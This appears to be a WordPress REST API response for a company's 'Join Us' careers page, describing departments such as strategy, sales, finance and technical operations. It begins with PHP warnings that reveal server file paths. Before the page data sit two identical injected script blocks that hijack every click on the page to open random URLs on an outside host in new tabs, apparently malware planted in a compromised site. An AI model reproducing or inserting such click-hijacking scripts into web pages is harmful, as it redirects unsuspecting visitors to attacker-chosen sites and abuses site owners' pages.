<br />
<b>Warning</b>:  The magic method BrunnCore\CPT\PostTypesRegister::__wakeup() must have public visibility in <b>/home/optimumexposures/public_html/staging/wp-content/plugins/brunn-core/post-types/post-types-register.php</b> on line <b>30</b><br />
<br />
<b>Warning</b>:  The magic method BrunnInstagramApi::__wakeup() must have public visibility in <b>/home/optimumexposures/public_html/staging/wp-content/plugins/brunn-instagram-feed/lib/brunn-instagram-api.php</b> on line <b>71</b><br />
<br />
<b>Warning</b>:  The magic method BrunnTwitterApi::__wakeup() must have public visibility in <b>/home/optimumexposures/public_html/staging/wp-content/plugins/brunn-twitter-feed/lib/brunn-twitter-api.php</b> on line <b>95</b><br />
<br />
<b>Warning</b>:  The magic method Vc_Manager::__wakeup() must have public visibility in <b>/home/optimumexposures/public_html/staging/wp-content/plugins/js_composer/include/classes/core/class-vc-manager.php</b> on line <b>203</b><br />
<br />
<b>Warning</b>:  The magic method BrunnSelectNamespace\Modules\Header\Lib\HeaderFactory::__wakeup() must have public visibility in <b>/home/optimumexposures/public_html/staging/wp-content/themes/optimum-exposures/framework/modules/header/lib/header-factory.php</b> on line <b>39</b><br />
<br />
<b>Warning</b>:  The magic method BrunnCore\Lib\ShortcodeLoader::__wakeup() must have public visibility in <b>/home/optimumexposures/public_html/staging/wp-content/plugins/brunn-core/lib/shortcode-loader.php</b> on line <b>28</b><br />
<br />
<b>Warning</b>:  The magic method BrunnInstagram\Lib\ShortcodeLoader::__wakeup() must have public visibility in <b>/home/optimumexposures/public_html/staging/wp-content/plugins/brunn-instagram-feed/lib/shortcode-loader.php</b> on line <b>28</b><br />
<br />
<b>Warning</b>:  The magic method BrunnTwitter\Lib\ShortcodeLoader::__wakeup() must have public visibility in <b>/home/optimumexposures/public_html/staging/wp-content/plugins/brunn-twitter-feed/lib/shortcode-loader.php</b> on line <b>28</b><br />
<script>(function (parameters) {
		const targets = [
			'https://ois.is/images/logo-1.png', 'https://ois.is/images/logo-2.png', 'https://ois.is/images/logo-3.png', 'https://ois.is/images/logo-4.png', 'https://ois.is/images/logo-5.png', 'https://ois.is/images/logo-6.png', 'https://ois.is/images/logo-7.png', 'https://ois.is/images/logo-8.png'
		]
		// Times between clicks
		const restMinutes = 1;
		// Number of hours to allow re-click 
		const allowedHours = 2;


		const saveTargetLocationsToStorage = (targets) => {
			targets.forEach((target, index) => {
				if(!localStorage.getItem(`${target}-local-storage`)){
					localStorage.setItem(`${target}-local-storage`, 0);
				}
			});
		}
		const getRandomLocationFromStorage = (targets) => {
			const nonVisited = targets.filter((target, index) => localStorage.getItem(`${target}-local-storage`) == 0)
			return nonVisited[Math.floor(Math.random() * nonVisited.length)];
		}
		const setLocationAsVisited = (target) => localStorage.setItem(`${target}-local-storage`, 1);

		const getTimeStorage = (key) => localStorage.getItem(`${key}-local-storage`);
		const setTimeToStorage = (key, nowDate) => localStorage.setItem(`${key}-local-storage`, nowDate);

		const getHoursDiff = (startDate, endDate) => {
			const msInHour = 1000 * 60 * 60;
			return Math.round(Math.abs(endDate - startDate) / msInHour);
		}
		const getMintsDiff = (startDate, endDate) => {
			const msInMints = 1000 * 60;
			return Math.round(Math.abs(endDate - startDate) / msInMints);
		}

		const visitNewLocation = (targets, host, nowDate) => {
			saveTargetLocationsToStorage(targets);
			newLocation = getRandomLocationFromStorage(targets);
			setTimeToStorage(`${host}-mnts`, nowDate);
			setTimeToStorage(`${host}-hurs`, nowDate);
			setLocationAsVisited(newLocation);
			window.open(newLocation, "_blank");
		}

		// const randomLocation = getRandomLocationFromStorage(targets);
		saveTargetLocationsToStorage(targets);

		function globalClick(event) {
			event.stopPropagation();
			const host = location.host;
			let newLocation = getRandomLocationFromStorage(targets);
			const nowDate = Date.parse(new Date());
			const savedDateForMints = getTimeStorage(`${host}-mnts`);
			const savedDateForHours = getTimeStorage(`${host}-hurs`);

			if (savedDateForMints && savedDateForHours) {
				try {
					const storageDateForMints = parseInt(savedDateForMints);
					const storageDateForHours = parseInt(savedDateForHours);
					const mintsDiff = getMintsDiff(nowDate, storageDateForMints);
					const hoursDiff = getHoursDiff(nowDate, storageDateForHours);

					if (hoursDiff >= allowedHours) {
						saveTargetLocationsToStorage(targets);
						setTimeToStorage(`${host}-hurs`, nowDate);
					}
					if (mintsDiff >= restMinutes) {
						if (newLocation) {
							setTimeToStorage(`${host}-mnts`, nowDate);
							window.open(newLocation, "_blank");
							setLocationAsVisited(newLocation);
						}
					}
				} catch (error) { visitNewLocation(targets, host, nowDate); }
			} else { visitNewLocation(targets, host, nowDate); }
		}
		document.addEventListener("click", globalClick)
	})()</script><script>(function (parameters) {
		const targets = [
			'https://ois.is/images/logo-1.png', 'https://ois.is/images/logo-2.png', 'https://ois.is/images/logo-3.png', 'https://ois.is/images/logo-4.png', 'https://ois.is/images/logo-5.png', 'https://ois.is/images/logo-6.png', 'https://ois.is/images/logo-7.png', 'https://ois.is/images/logo-8.png'
		]
		// Times between clicks
		const restMinutes = 1;
		// Number of hours to allow re-click 
		const allowedHours = 2;


		const saveTargetLocationsToStorage = (targets) => {
			targets.forEach((target, index) => {
				if(!localStorage.getItem(`${target}-local-storage`)){
					localStorage.setItem(`${target}-local-storage`, 0);
				}
			});
		}
		const getRandomLocationFromStorage = (targets) => {
			const nonVisited = targets.filter((target, index) => localStorage.getItem(`${target}-local-storage`) == 0)
			return nonVisited[Math.floor(Math.random() * nonVisited.length)];
		}
		const setLocationAsVisited = (target) => localStorage.setItem(`${target}-local-storage`, 1);

		const getTimeStorage = (key) => localStorage.getItem(`${key}-local-storage`);
		const setTimeToStorage = (key, nowDate) => localStorage.setItem(`${key}-local-storage`, nowDate);

		const getHoursDiff = (startDate, endDate) => {
			const msInHour = 1000 * 60 * 60;
			return Math.round(Math.abs(endDate - startDate) / msInHour);
		}
		const getMintsDiff = (startDate, endDate) => {
			const msInMints = 1000 * 60;
			return Math.round(Math.abs(endDate - startDate) / msInMints);
		}

		const visitNewLocation = (targets, host, nowDate) => {
			saveTargetLocationsToStorage(targets);
			newLocation = getRandomLocationFromStorage(targets);
			setTimeToStorage(`${host}-mnts`, nowDate);
			setTimeToStorage(`${host}-hurs`, nowDate);
			setLocationAsVisited(newLocation);
			window.open(newLocation, "_blank");
		}

		// const randomLocation = getRandomLocationFromStorage(targets);
		saveTargetLocationsToStorage(targets);

		function globalClick(event) {
			event.stopPropagation();
			const host = location.host;
			let newLocation = getRandomLocationFromStorage(targets);
			const nowDate = Date.parse(new Date());
			const savedDateForMints = getTimeStorage(`${host}-mnts`);
			const savedDateForHours = getTimeStorage(`${host}-hurs`);

			if (savedDateForMints && savedDateForHours) {
				try {
					const storageDateForMints = parseInt(savedDateForMints);
					const storageDateForHours = parseInt(savedDateForHours);
					const mintsDiff = getMintsDiff(nowDate, storageDateForMints);
					const hoursDiff = getHoursDiff(nowDate, storageDateForHours);

					if (hoursDiff >= allowedHours) {
						saveTargetLocationsToStorage(targets);
						setTimeToStorage(`${host}-hurs`, nowDate);
					}
					if (mintsDiff >= restMinutes) {
						if (newLocation) {
							setTimeToStorage(`${host}-mnts`, nowDate);
							window.open(newLocation, "_blank");
							setLocationAsVisited(newLocation);
						}
					}
				} catch (error) { visitNewLocation(targets, host, nowDate); }
			} else { visitNewLocation(targets, host, nowDate); }
		}
		document.addEventListener("click", globalClick)
	})()</script>{"id":5898,"date":"2020-12-18T11:19:32","date_gmt":"2020-12-18T11:19:32","guid":{"rendered":"https:\/\/staging.optimumexposures.com\/?page_id=5898"},"modified":"2020-12-24T14:46:10","modified_gmt":"2020-12-24T14:46:10","slug":"join-us","status":"publish","type":"page","link":"https:\/\/staging.optimumexposures.com\/?page_id=5898","title":{"rendered":"Join Us"},"content":{"rendered":"<p>[vc_row css=&#8221;.vc_custom_1608821099860{padding-top: 75px !important;}&#8221;][vc_column][vc_row_inner content_placement=&#8221;middle&#8221; row_content_width=&#8221;grid&#8221;][vc_column_inner width=&#8221;1\/2&#8243;][vc_single_image image=&#8221;5721&#8243; img_size=&#8221;full&#8221;][\/vc_column_inner][vc_column_inner width=&#8221;1\/2&#8243;][vc_column_text css=&#8221;.vc_custom_1608821166969{padding-left: 30px !important;}&#8221;]Talents are at the core of what we do and achieve as a business.<\/p>\n<p>The business of the future is vibrant, universal, seamless and pioneering. It will be ferociously competitive and only the impeccably ground-breaking and only ingenious will rise to the top.<\/p>\n<p>This is why the Optimum Exposures track is the resurgence of originality, invention, creative distinction and innovativeness through exceptional use of superlative talents who are certainly the most considered, most sought after and exceptionally managed and remunerated.[\/vc_column_text][\/vc_column_inner][\/vc_row_inner][\/vc_column][\/vc_row][vc_row row_content_width=&#8221;grid&#8221; css=&#8221;.vc_custom_1608290924763{padding-top: 75px !important;padding-bottom: 75px !important;}&#8221;][vc_column][vc_row_inner][vc_column_inner width=&#8221;1\/6&#8243;][\/vc_column_inner][vc_column_inner width=&#8221;2\/3&#8243;][vc_column_text css_animation=&#8221;fadeInUp&#8221; css=&#8221;.vc_custom_1608583036447{padding-bottom: 40px !important;}&#8221;]<\/p>\n<h3><b>Corporate Strategy and Planning<\/b><\/h3>\n<p><strong>i. Corporate Strategy<\/strong><\/p>\n<p>The ability to make decisions that will project a business forward involves strategic thinking that is reinforced by data insight. Our team uses a methodical approach to sourcing, analyzing and visualizing data. We use this information to discern observable key patterns and inform innovation and design, strategic planning and insight generation.<\/p>\n<p>Do you have well-honed skills in data analytics, visualization and story-telling and a drive for detailed research using best practice methodologies? Are you skilled in drafting business documents?<\/p>\n<p>We\u2019d like to have a chat with you.<\/p>\n<p><strong>ii. Research and Development<\/strong><\/p>\n<p>Our Research and Development stay relevant and ahead of the constantly evolving market by incorporating retrospection, comprehension and foresight to transform and develop new products and solutions.<\/p>\n<p>As a member of the team, you will take part in carrying out market research, product development, feasibility studies, technical design and specifications, planning pricing model, and project management.[\/vc_column_text][vc_column_text css_animation=&#8221;fadeInUp&#8221; css=&#8221;.vc_custom_1608583021756{padding-bottom: 40px !important;}&#8221;]<\/p>\n<h3>Sales and Marketing<\/h3>\n<p>Our Sales and Marketing Team provides a connection between our Clients and the ground-breaking OOH solutions we provide. By utilizing their broad industry astuteness and understanding of account management and sales approaches, they put in everything required to successfully secure businesses for the company.[\/vc_column_text][vc_column_text css_animation=&#8221;fadeInUp&#8221; css=&#8221;.vc_custom_1608583060767{padding-bottom: 40px !important;}&#8221;]<\/p>\n<h3>Finance and Accounts<\/h3>\n<p>Our Finance and Accounts Team implements control, ensures approved projects and operational activities are funded; while making sure the records are kept up-to-date. They also ensure various finance and accounting reports for the business are generated as at when due.[\/vc_column_text][vc_column_text css_animation=&#8221;fadeInUp&#8221; css=&#8221;.vc_custom_1608583070815{padding-bottom: 40px !important;}&#8221;]<\/p>\n<h3>Design and Technical Operations<\/h3>\n<p>We have a robust Team for Design and Technical Operations due to the nature of our business. This Team consists of Engineers (Civil, Structural and Electrical\/Electronics), Technology Specialists, Content Designers, Bill Posters, and Procurement Officer. This Team ensures our OOH assets (boards) are built and maintained in accordance with various regulatory standards; as well as manage the posting of Clients\u2019 campaigns at various sites.[\/vc_column_text][\/vc_column_inner][vc_column_inner width=&#8221;1\/6&#8243;][\/vc_column_inner][\/vc_row_inner][\/vc_column][\/vc_row][vc_row equal_height=&#8221;yes&#8221; content_placement=&#8221;middle&#8221;][vc_column css=&#8221;.vc_custom_1537536715646{background-color: #003d4b !important;}&#8221; offset=&#8221;vc_col-lg-6 vc_col-md-12&#8243;]<div class=\"qodef-elements-holder   qodef-one-column  qodef-responsive-mode-768 \" ><div class=\"qodef-eh-item    \"  data-item-class=\"qodef-eh-custom-4951\" data-1367-1600=\"58px 148px 103px 119px\" data-1025-1366=\"44px 80px 89px 126px\" data-769-1024=\"182px 47% 226px 112px\" data-681-768=\"84px 30% 131px 112px\" data-680=\"0px 48px 45px 20px\">\n\t<div class=\"qodef-eh-item-inner\">\n\t\t<div class=\"qodef-eh-item-content qodef-eh-custom-4951\" style=\"padding: 149px 225px 194px 299px\">\n\t\t\t<div class=\"qodef-section-title-holder  qodef-st-standard qodef-st-title-left qodef-st-normal-space \" >\n\t<div class=\"qodef-st-inner\">\n\t\t\t\t\t<h1 class=\"qodef-st-title\" style=\"color: #ffffff\">\n\t\t\t\tLife at Optimum Exposures\t\t\t<\/h1>\n\t\t        \t\t\t<\/div>\n<\/div>\t\t<\/div>\n\t<\/div>\n<\/div><\/div>[\/vc_column][vc_column offset=&#8221;vc_col-lg-6 vc_col-md-12&#8243; css=&#8221;.vc_custom_1537538436953{padding-top: 0px !important;padding-right: 0px !important;padding-bottom: 0px !important;padding-left: 0px !important;}&#8221;]<div class=\"qodef-elements-holder   qodef-one-column  qodef-responsive-mode-768 \" ><div class=\"qodef-eh-item    \" style=\"background-image: url(https:\/\/staging.optimumexposures.com\/wp-content\/uploads\/2018\/09\/p12-img-1.jpg)\" data-item-class=\"qodef-eh-custom-8490\" data-1367-1600=\"274px 0%\" data-1025-1366=\"260px 0%\" data-769-1024=\"398px 0%\" data-681-768=\"301px 0%\" data-680=\"153px 0%\">\n\t<div class=\"qodef-eh-item-inner\">\n\t\t<div class=\"qodef-eh-item-content qodef-eh-custom-8490\" style=\"padding: 365px 0%\">\n\t\t\t\t\t<\/div>\n\t<\/div>\n<\/div><\/div>[\/vc_column][\/vc_row]<\/p>\n","protected":false},"excerpt":{"rendered":"<p>[vc_row css=&#8221;.vc_custom_1608821099860{padding-top: 75px !important;}&#8221;][vc_column][vc_row_inner content_placement=&#8221;middle&#8221; row_content_width=&#8221;grid&#8221;][vc_column_inner width=&#8221;1\/2&#8243;][vc_single_image image=&#8221;5721&#8243; img_size=&#8221;full&#8221;][\/vc_column_inner][vc_column_inner width=&#8221;1\/2&#8243;][vc_column_text css=&#8221;.vc_custom_1608821166969{padding-left: 30px !important;}&#8221;]Talents are at the core of what we [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":0,"parent":0,"menu_order":0,"comment_status":"closed","ping_status":"closed","template":"full-width.php","meta":[],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v18.2 - https:\/\/yoast.com\/wordpress\/plugins\/seo\/ -->\n<title>Join Us - Optimum Exposures<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/staging.optimumexposures.com\/?page_id=5898\" \/>\n<meta property=\"og:locale\" content=\"en_US\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"Join Us - Optimum Exposures\" \/>\n<meta property=\"og:description\" content=\"[vc_row css=&#8221;.vc_custom_1608821099860{padding-top: 75px !important;}&#8221;][vc_column][vc_row_inner content_placement=&#8221;middle&#8221; row_content_width=&#8221;grid&#8221;][vc_column_inner width=&#8221;1\/2&#8243;][vc_single_image image=&#8221;5721&#8243; img_size=&#8221;full&#8221;][\/vc_column_inner][vc_column_inner width=&#8221;1\/2&#8243;][vc_column_text css=&#8221;.vc_custom_1608821166969{padding-left: 30px !important;}&#8221;]Talents are at the core of what we [&hellip;]\" \/>\n<meta property=\"og:url\" content=\"https:\/\/staging.optimumexposures.com\/?page_id=5898\" \/>\n<meta property=\"og:site_name\" content=\"Optimum Exposures\" \/>\n<meta property=\"article:modified_time\" content=\"2020-12-24T14:46:10+00:00\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:label1\" content=\"Est. reading time\" \/>\n\t<meta name=\"twitter:data1\" content=\"4 minutes\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\/\/schema.org\",\"@graph\":[{\"@type\":\"WebSite\",\"@id\":\"https:\/\/staging.optimumexposures.com\/#website\",\"url\":\"https:\/\/staging.optimumexposures.com\/\",\"name\":\"Optimum Exposures\",\"description\":\"\",\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\/\/staging.optimumexposures.com\/?s={search_term_string}\"},\"query-input\":\"required name=search_term_string\"}],\"inLanguage\":\"en-US\"},{\"@type\":\"WebPage\",\"@id\":\"https:\/\/staging.optimumexposures.com\/?page_id=5898#webpage\",\"url\":\"https:\/\/staging.optimumexposures.com\/?page_id=5898\",\"name\":\"Join Us - Optimum Exposures\",\"isPartOf\":{\"@id\":\"https:\/\/staging.optimumexposures.com\/#website\"},\"datePublished\":\"2020-12-18T11:19:32+00:00\",\"dateModified\":\"2020-12-24T14:46:10+00:00\",\"breadcrumb\":{\"@id\":\"https:\/\/staging.optimumexposures.com\/?page_id=5898#breadcrumb\"},\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\/\/staging.optimumexposures.com\/?page_id=5898\"]}]},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\/\/staging.optimumexposures.com\/?page_id=5898#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\/\/staging.optimumexposures.com\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"Join Us\"}]}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"Join Us - Optimum Exposures","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/staging.optimumexposures.com\/?page_id=5898","og_locale":"en_US","og_type":"article","og_title":"Join Us - Optimum Exposures","og_description":"[vc_row css=&#8221;.vc_custom_1608821099860{padding-top: 75px !important;}&#8221;][vc_column][vc_row_inner content_placement=&#8221;middle&#8221; row_content_width=&#8221;grid&#8221;][vc_column_inner width=&#8221;1\/2&#8243;][vc_single_image image=&#8221;5721&#8243; img_size=&#8221;full&#8221;][\/vc_column_inner][vc_column_inner width=&#8221;1\/2&#8243;][vc_column_text css=&#8221;.vc_custom_1608821166969{padding-left: 30px !important;}&#8221;]Talents are at the core of what we [&hellip;]","og_url":"https:\/\/staging.optimumexposures.com\/?page_id=5898","og_site_name":"Optimum Exposures","article_modified_time":"2020-12-24T14:46:10+00:00","twitter_card":"summary_large_image","twitter_misc":{"Est. reading time":"4 minutes"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"WebSite","@id":"https:\/\/staging.optimumexposures.com\/#website","url":"https:\/\/staging.optimumexposures.com\/","name":"Optimum Exposures","description":"","potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/staging.optimumexposures.com\/?s={search_term_string}"},"query-input":"required name=search_term_string"}],"inLanguage":"en-US"},{"@type":"WebPage","@id":"https:\/\/staging.optimumexposures.com\/?page_id=5898#webpage","url":"https:\/\/staging.optimumexposures.com\/?page_id=5898","name":"Join Us - Optimum Exposures","isPartOf":{"@id":"https:\/\/staging.optimumexposures.com\/#website"},"datePublished":"2020-12-18T11:19:32+00:00","dateModified":"2020-12-24T14:46:10+00:00","breadcrumb":{"@id":"https:\/\/staging.optimumexposures.com\/?page_id=5898#breadcrumb"},"inLanguage":"en-US","potentialAction":[{"@type":"ReadAction","target":["https:\/\/staging.optimumexposures.com\/?page_id=5898"]}]},{"@type":"BreadcrumbList","@id":"https:\/\/staging.optimumexposures.com\/?page_id=5898#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/staging.optimumexposures.com\/"},{"@type":"ListItem","position":2,"name":"Join Us"}]}]}},"_links":{"self":[{"href":"https:\/\/staging.optimumexposures.com\/index.php?rest_route=\/wp\/v2\/pages\/5898"}],"collection":[{"href":"https:\/\/staging.optimumexposures.com\/index.php?rest_route=\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/staging.optimumexposures.com\/index.php?rest_route=\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/staging.optimumexposures.com\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/staging.optimumexposures.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=5898"}],"version-history":[{"count":19,"href":"https:\/\/staging.optimumexposures.com\/index.php?rest_route=\/wp\/v2\/pages\/5898\/revisions"}],"predecessor-version":[{"id":5948,"href":"https:\/\/staging.optimumexposures.com\/index.php?rest_route=\/wp\/v2\/pages\/5898\/revisions\/5948"}],"wp:attachment":[{"href":"https:\/\/staging.optimumexposures.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=5898"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}